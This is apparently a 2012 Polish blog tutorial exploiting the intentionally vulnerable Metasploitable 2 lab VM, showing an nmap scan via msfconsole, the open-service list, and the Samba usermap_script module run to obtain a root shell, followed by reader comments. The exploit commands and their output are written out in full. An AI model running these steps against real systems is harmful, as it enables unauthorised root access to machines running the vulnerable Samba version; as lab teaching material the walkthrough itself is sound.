Strona główna > Metasploit > Rapid7 – Metasploitable 2

Rapid7 – Metasploitable 2

Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from Sourceforge.net and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. (read all)

Metasploitable 2 running on VMware  looks like this:

Rapid7

Metasploitable2

Here we go


c:\rapid7\metasploit\msfconsole.bat

Check the version

msf > version
Framework: 4.4.0-dev.15205
Console  : 4.4.0-dev.15168
msf >

Connect to the database:

Connect To DataBase

Connect To the DataBase

Now we should be able to enter the db_nmap command from within msfconsole to run nmap and have its results automatically stored in our new database.

msf > db_nmap -sS -A 192.168.235.129

db_nmap

Cd..

[*] Nmap: MAC Address: 00:0C:29:BF:08:FB (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS details: Linux 2.6.9 – 2.6.31
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   Name: WORKGROUP\Unknown
[*] Nmap: |_  System time: 2012-06-14 21:07:53 UTC-4
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.44 ms 192.168.235.129
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds
msf >

Result:

msf > services

Services
========

host             port  proto  name         state  info
—-             —-  —–  —-         —–  —-
192.168.235.129  21    tcp    ftp                                   open   vsftpd 2.3.4
192.168.235.129  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1
protocol 2.0
192.168.235.129  23    tcp    telnet       open   Linux telnetd
192.168.235.129  25    tcp    smtp         open   Postfix smtpd
192.168.235.129  53    tcp    domain       open   ISC BIND 9.4.2
192.168.235.129  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.235.129  110   tcp    pop3-proxy   open   AVG pop3 proxy broken
192.168.235.129  111   tcp    rpcbind      open   2 rpc #100000
192.168.235.129  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.235.129  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.235.129  512   tcp    exec         open   netkit-rsh rexecd
192.168.235.129  513   tcp    login        open
192.168.235.129  514   tcp    shell        open
192.168.235.129  1099  tcp    jrmi         open   GNU Classpath grmiregistry
192.168.235.129  1524  tcp    ingreslock   open
192.168.235.129  2049  tcp    nfs          open   2-4 rpc #100003
192.168.235.129  2121  tcp    ccproxy-ftp  open
192.168.235.129  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
192.168.235.129  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 – 8.3.7
192.168.235.129  5900  tcp    vnc          open   VNC protocol 3.3
192.168.235.129  6000  tcp    x11          open   access denied
192.168.235.129  6667  tcp    irc          open   Unreal ircd
192.168.235.129  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
192.168.235.129  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Let’s search for a Samba exploit and try it against the system:

msf>search samba

search samba

msf>search samba

The first shot is:

msf > use exploit/multi/samba/usermap_script

msf  exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                        yes       The target address
RPORT  139              yes       The target port

Exploit target:

Id  Name
—  —-
0   Automatic

msf  exploit(usermap_script) > set RHOST 192.168.235.129
RHOST => 192.168.235.129
msf  exploit(usermap_script) > exploit

Result:

exploit

exploit

I’m „super user”

id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Reklamy
Kategorie:Metasploit
  1. Czerwiec 25, 2012 o 10:41 am

    Wow that was odd. I just wrote an extremely long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say wonderful blog!

  2. Październik 17, 2012 o 8:07 am

    Good day! Do you use Twitter? I’d like to follow you if that would be ok. I’m definitely
    enjoying your blog and look forward to new posts.

  3. Październik 17, 2012 o 9:25 pm

    Hey! This is my first comment here so I just wanted to give
    a quick shout out and say I truly enjoy reading your
    blog posts. Can you recommend any other blogs/websites/forums that go over the
    same topics? Thanks for your time!

  1. Czerwiec 15, 2012 o 7:51 pm

Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Wyloguj / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Wyloguj / Zmień )

Zdjęcie na Facebooku

Komentujesz korzystając z konta Facebook. Wyloguj / Zmień )

Zdjęcie na Google+

Komentujesz korzystając z konta Google+. Wyloguj / Zmień )

Connecting to %s

%d blogerów lubi to: